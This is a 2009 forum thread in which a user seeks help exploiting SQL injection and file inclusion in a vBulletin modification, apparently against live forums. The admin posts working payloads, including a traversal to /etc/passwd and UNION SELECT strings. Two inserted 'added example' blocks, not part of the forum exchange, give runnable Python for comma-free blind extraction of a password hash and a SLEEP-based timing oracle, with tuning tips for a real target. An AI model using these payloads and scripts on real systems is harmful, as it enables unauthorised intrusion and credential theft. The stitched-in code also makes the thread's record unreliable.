IT Security and Insecurity Portal

Help with Mysql Injection - Bugged script

Posted: Sun Jan 11, 2009 4:22 pm
delta (Advanced user; Joined: Jan 11, 2009; Posts: 60)
I found this bug in one component and I think it can be exploited, but I need some help...
I will give some details...

Quote:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in [path]/file.php on line 204
Warning: include(folder/forms/.php) [function.include]: failed to open stream: No such file or directory in [path]/file.php on line 300
Warning: include() [function.include]: Failed opening 'folder/forms/.php' for inclusion (include_path='.:/usr/lib/php') in [path]/file.php on line 300

Some piece of code from file.php:
Code:
if ($form) {
    // $form is an untrusted request value; it is split on "," into three parts
    $the_target = $form;
    $the_target = explode(",", $the_target);
    $forum      = $the_target[0];   // goes straight into the SQL below
    $formulario = $the_target[1];
    $links      = $the_target[2];
    // $forum is concatenated, unescaped, into a single-quoted string literal
    $sqlSecure = "select id from ".TABLE_PREFIX."up_grupos where forumid = '".$forum."'".( ($membroNormal)?" and `permissoes`='livre'":"" );
    // mysql_query() returns false on a syntax error, which is what makes
    // mysql_num_rows() emit the warning on line 204
    $qrySecure = mysql_query($sqlSecure);
    $forum_permitido = (mysql_num_rows($qrySecure)) ? true : false;
    // ... (rest of the block not shown in the post)
}

Line 204:
Code:
$forum_permitido = (mysql_num_rows($qrySecure)) ? true : false;

Query of table up_grupos:
Code:
CREATE TABLE `". TABLE_PREFIX ."up_grupos` (
  `id` int(11) NOT NULL auto_increment,
  `idGrupo` int(11) default NULL,
  `descricao` varchar(150) default NULL,
  `tipo` varchar(4) NOT NULL default 'http',
  `conteudo` varchar(20) NOT NULL default 'filme',
  `nivel` decimal(2,0) NOT NULL default '0',
  `forumid` int(11) default NULL,
  `permissoes` varchar(5) NOT NULL default 'staff',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM ;

Posted: Tue Jan 13, 2009 3:30 am
delta (Advanced user; Joined: Jan 11, 2009; Posts: 60)
So... no one? =/

Posted: Wed Jan 14, 2009 12:52 pm
Rastlin (Regular user; Joined: Jan 03, 2009; Posts: 21)
delta wrote:
So... no one? =/

There is insufficient data... I might try to guess that somehow you're giving a wrong path somewhere...

Posted: Wed Jan 14, 2009 1:40 pm
waraxe (Site admin; Joined: May 11, 2004; Posts: 2407; Location: Estonia, Tartu)
More info needed - input parameters. There can be blind SQL injection or maybe even LFI or RFI, but without additional info we can't help you.

Posted: Wed Jan 14, 2009 3:23 pm
delta (Advanced user; Joined: Jan 11, 2009; Posts: 60)
I don't think it's RFI or LFI.
It's a vBulletin MOD.
This sends information to the database. Ex.:
http://site.com/forum/file.php?form=9,blabla,http
It uses explode as you can see in the code:
Code:
$the_target = explode(",", $the_target);
and sends to these vars...
Code:
$forum      = $the_target[0];
$formulario = $the_target[1];
$links      = $the_target[2];
and then comes the query:
Code:
$sqlSecure = "select id from ".TABLE_PREFIX."up_grupos where forumid = '".$forum."'".( ($membroNormal)?" and `permissoes`='livre'":"" );
$qrySecure = mysql_query($sqlSecure);
So, theoretically I should do this:
http://site.com/forum/file.php?form=SQL INJECTION CODE,blabla,http
Sorry for my poor English and thanks in advance for the help.
Edited:
Now I tried http://site.com/forum/file.php?form=9',blabla,http as I said before and got only this:
Code:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in [path]/file.php on line 204
No other errors.
And I forgot to tell that it gets the $formulario and does this in another line of the code:
Code:
include "folder/forms/".$formulario.".php";
That's the reason I was getting the 2 include errors...
Sooo...
Does that help now?

Posted: Wed Jan 14, 2009 4:15 pm
waraxe (Site admin; Joined: May 11, 2004; Posts: 2407; Location: Estonia, Tartu)
This can be LFI, try this:
Code:
http://site.com/forum/file.php?form=9,../../../../../../../../../../etc/passwd%00,http
For SQL injection try:
Code:
http://site.com/forum/file.php?form=-1'+UNION+SELECT+0--+,bla,http
Code:
http://site.com/forum/file.php?form=-1'+UNION+SELECT+1--+,bla,http
This is probably blind SQL injection though. Can you post that MOD's name? I can look at the src code and look for possible exploits.

Posted: Wed Jan 14, 2009 5:12 pm
delta (Advanced user; Joined: Jan 11, 2009; Posts: 60)
waraxe wrote:
This can be LFI, try this:
Code:
http://site.com/forum/file.php?form=9,../../../../../../../../../../etc/passwd%00,http
For SQL injection try:
Code:
http://site.com/forum/file.php?form=-1'+UNION+SELECT+0--+,bla,http
Code:
http://site.com/forum/file.php?form=-1'+UNION+SELECT+1--+,bla,http
This is probably blind SQL injection though. Can you post that MOD's name? I can look at the src code and look for possible exploits.

The LFI works fine (in some forums I get 403 or 406) xD
I tried the SQL injection
Code:
http://site.com/forum/file.php?form=-1'+UNION+SELECT+0--+,bla,http
and no errors were displayed.
The problem now is how I can exploit the injection, since I can't use "," because of the explode :S
The mod has 1 more SQL-injection-bugged file that I found; I can't give you the mod name now, but maybe later.
Thanks a lot for your help

Posted: Wed Jan 14, 2009 7:16 pm
waraxe (Site admin; Joined: May 11, 2004; Posts: 2407; Location: Estonia, Tartu)
Yes, this can be tricky without ","-s. But you could probably use regular expressions (regexes) instead of ORD(SUBSTR(hash,2,1)) and CASE/WHEN/ELSE instead of IF(1,2,3). I'm not 100% sure about that, it needs testing.
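The data flow delta describes (explode on ",", first element into the quoted SQL literal, second into the include path), waraxe's UNION probes, and the "no commas" problem raised in the last two posts, worked through as an added example that is not code from the thread or from the MOD. It models the vulnerable check in Python on an in-memory SQLite table shaped like up_grupos; the user table, its columns and the password hash are constructed stand-ins, since the forum's real user table is not on this page. It then extracts the hash without a single comma. Two points the thread does not spell out: the oracle is mysql_num_rows(), which only sees the row count, so the condition has to sit in the WHERE clause of the UNION branch (an IF()/CASE in the select list would return one row either way); and the per-character test can be a plain string `>=` on a growing prefix, binary-searched over the hex alphabet, which needs neither ORD(SUBSTR(...)) nor a regex. Other comma-free MySQL forms, if you need them: SUBSTRING(col FROM 2 FOR 1), MID(col FROM 2 FOR 1), CASE WHEN ... THEN ... ELSE ... END in place of IF(), and LIMIT 1 OFFSET 1 in place of LIMIT 1,1. The `>=` comparison is case-insensitive under MySQL's default collation, which does not matter for a lowercase hex digest.

```python
"""Added example, not the MOD's code: simulated file.php check plus a
comma-free boolean-blind extraction. Schema and hash are constructed."""
import hashlib
import sqlite3

ADMIN_HASH = hashlib.md5(b"password").hexdigest()  # constructed sample hash

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE up_grupos (id INTEGER PRIMARY KEY, forumid INTEGER, permissoes TEXT);
CREATE TABLE user (userid INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO up_grupos VALUES (1, 9, 'livre');
""")
conn.execute("INSERT INTO user VALUES (1, 'admin', ?)", (ADMIN_HASH,))


def forum_permitido(form, membro_normal=True):
    """Mirror of the PHP sink: explode(',') then raw string concatenation.
    True = at least one row, False = zero rows, None = SQL error (the
    mysql_num_rows() warning on the real target)."""
    forum = form.split(",")[0]          # only the first element reaches the SQL
    sql = "select id from up_grupos where forumid = '" + forum + "'"
    if membro_normal:
        sql += " and `permissoes`='livre'"
    try:
        return len(conn.execute(sql).fetchall()) > 0
    except sqlite3.OperationalError:
        return None


def forum_permitido_safe(form, membro_normal=True):
    """Hardened form: bind the value instead of concatenating it."""
    forum = form.split(",")[0]
    sql = "select id from up_grupos where forumid = ?"
    if membro_normal:
        sql += " and `permissoes`='livre'"
    return len(conn.execute(sql, (forum,)).fetchall()) > 0


HEX = "0123456789abcdef"
PROBES = {"count": 0}


def probe(prefix):
    """One boolean-blind request. The row count of the UNION branch is the
    oracle, so the condition has to sit in its WHERE clause. No commas:
    the payload must survive explode(',') intact."""
    payload = ("-1' UNION SELECT 1 FROM user WHERE userid=1"
               " AND password >= '" + prefix + "'-- ")
    assert "," not in payload
    PROBES["count"] += 1
    return forum_permitido(payload + ",bla,http") is True


def extract_hash(length=32):
    """Recover the hash one hex digit at a time, 4 requests per digit:
    binary search for the largest c with hash >= known_prefix + c.
    Returns (hash, number of requests used)."""
    PROBES["count"] = 0
    found = ""
    for _ in range(length):
        lo, hi = 0, len(HEX) - 1
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if probe(found + HEX[mid]):
                lo = mid
            else:
                hi = mid - 1
        found += HEX[lo]
    return found, PROBES["count"]


if __name__ == "__main__":
    print(forum_permitido("9,blabla,http"))                  # True: normal use
    print(forum_permitido("9',blabla,http"))                 # None: broken SQL
    print(forum_permitido("-1' UNION SELECT 0-- ,bla,http"))  # True: UNION row
    print(forum_permitido_safe("-1' UNION SELECT 0-- ,bla,http"))  # False
    print(extract_hash())                                    # (hash, 128)
```

The `9'` probe maps to the "not a valid MySQL result resource" warning delta saw, and waraxe's `-1' UNION SELECT 0-- ` probe returns one row whether the value is 0 or 1, which is why it produced no error but also no visible difference. Against the bound-parameter variant every payload is just a forumid that matches nothing.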

Posted: Wed Jan 14, 2009 7:27 pm
delta (Advanced user; Joined: Jan 11, 2009; Posts: 60)
This will be very complicated T___T
I think it's better to try the other file...
Do you mind taking a look at the other file to see what can be done?
If OK I will send it to you via PM.

Posted: Wed Jan 14, 2009 8:59 pm
waraxe (Site admin; Joined: May 11, 2004; Posts: 2407; Location: Estonia, Tartu)
I'm too busy right now - a new advisory is coming out very soon and I'm preparing it right now.

Posted: Wed Jan 14, 2009 9:11 pm
delta (Advanced user; Joined: Jan 11, 2009; Posts: 60)
Ok, no problem ^^
In the other file I'm getting some errors:
http://site.com/file.php?do=lol&action=form&id_topic=6727'
Quote:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [path]/folder/editar.php on line 237
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [path]/folder/editar.php on line 244
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [path]/folder/editar.php on line 266
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [path]/folder/editar.php on line 288
Warning: include(forms/.php) [function.include]: failed to open stream: No such file or directory in [path]/folder/editar.php on line 436
Warning: include() [function.include]: Failed opening 'forms/.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in [path]/folder/editar.php on line 436
When I do:
http://site.com/file.php?do=lol&action=form&id_topic=-1'+UNION+SELECT+1,2,3,4--+
this error disappears (same if I change the column number: other errors will disappear and some remain, because the column count of the tables is different):
Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [path]/folder/editar.php on line 244
but no column number is displayed on the page. What can I do next?

Posted: Wed Jan 14, 2009 9:54 pm
waraxe (Site admin; Joined: May 11, 2004; Posts: 2407; Location: Estonia, Tartu)
As usual - if you can't get direct visual feedback from the target, then try blind injection. Look for response differences or, as a last resort, use BENCHMARK() or SLEEP().
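The situation in the last two posts (a query whose result never reaches the page, a warning that disappears once the UNION has the right number of columns, and the advice to fall back on response differences or on BENCHMARK()/SLEEP()), as an added example that is not code from the thread or from the MOD. The query behind editar.php line 244 is not on this page, so the sink below is an assumed SELECT over a constructed four-column topics table, and SLEEP() is registered into SQLite only to stand in for MySQL's function. It shows the two oracles: the error oracle (query ran or not) used to count UNION columns the way delta found them, and the timing oracle for when even that difference is gone. The timing payload is comma-free as well, and it uses the existing id_topic 6727 on purpose: the injected AND is only evaluated for rows the first condition matches, so a non-existent id would never trigger the sleep.

```python
"""Added example, not the MOD's code: assumed editar.php sink for id_topic,
an error oracle to count UNION columns, and a SLEEP()-based timing oracle."""
import sqlite3
import time

conn = sqlite3.connect(":memory:")
# Stand-in for MySQL SLEEP(): sleeps, then returns 0 like the real function.
conn.create_function("SLEEP", 1, lambda secs: time.sleep(secs) or 0)
conn.executescript("""
CREATE TABLE topics (id_topic INTEGER PRIMARY KEY, forumid INTEGER,
                     title TEXT, body TEXT);
INSERT INTO topics VALUES (6727, 9, 'constructed topic', 'constructed body');
""")


def query_ok(id_topic):
    """Error oracle. True: the query parsed and ran. False: it failed, which
    on the target shows up as the mysql_fetch_array() warning.
    Assumed four-column query; the real line 244 is not on the page."""
    sql = ("SELECT id_topic, forumid, title, body FROM topics"
           " WHERE id_topic = '" + id_topic + "'")
    try:
        conn.execute(sql).fetchall()
        return True
    except sqlite3.OperationalError:
        return False


def count_columns(max_cols=12):
    """Grow UNION SELECT 1,2,...,n until the column-count error disappears.
    Commas are fine here: id_topic is not run through explode()."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        if query_ok("-1' UNION SELECT " + cols + "-- "):
            return n
    return None


def timed_probe(condition, delay=0.3):
    """Timing oracle for a page that looks the same either way. CASE/WHEN
    instead of IF() keeps it comma-free; the known-existing id makes sure
    the injected AND is actually evaluated for a row."""
    payload = ("6727' AND CASE WHEN (" + condition + ") THEN SLEEP("
               + str(delay) + ") ELSE 0 END-- ")
    assert "," not in payload
    start = time.monotonic()
    query_ok(payload)
    return time.monotonic() - start >= delay * 0.9


def title_starts_with(prefix):
    """One time-based yes/no question about data the page never displays."""
    return timed_probe("(SELECT title FROM topics WHERE id_topic=6727)"
                       " LIKE '" + prefix + "%'")


if __name__ == "__main__":
    print(query_ok("6727'"))                       # False: the quote breaks the query
    print(count_columns())                         # 4
    print(timed_probe("1=1"), timed_probe("1=2"))  # True False
    print(title_starts_with("con"))                # True
```

On a real target the threshold has to be chosen against the normal round-trip time, and each request should be repeated when the result is close to it; BENCHMARK() behaves the same way but burns CPU on the server instead of idling, so SLEEP() is the gentler choice where it is available.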

www.waraxe.us Forum Index -> Sql injection
Powered by phpBB © 2001-2008 phpBB Group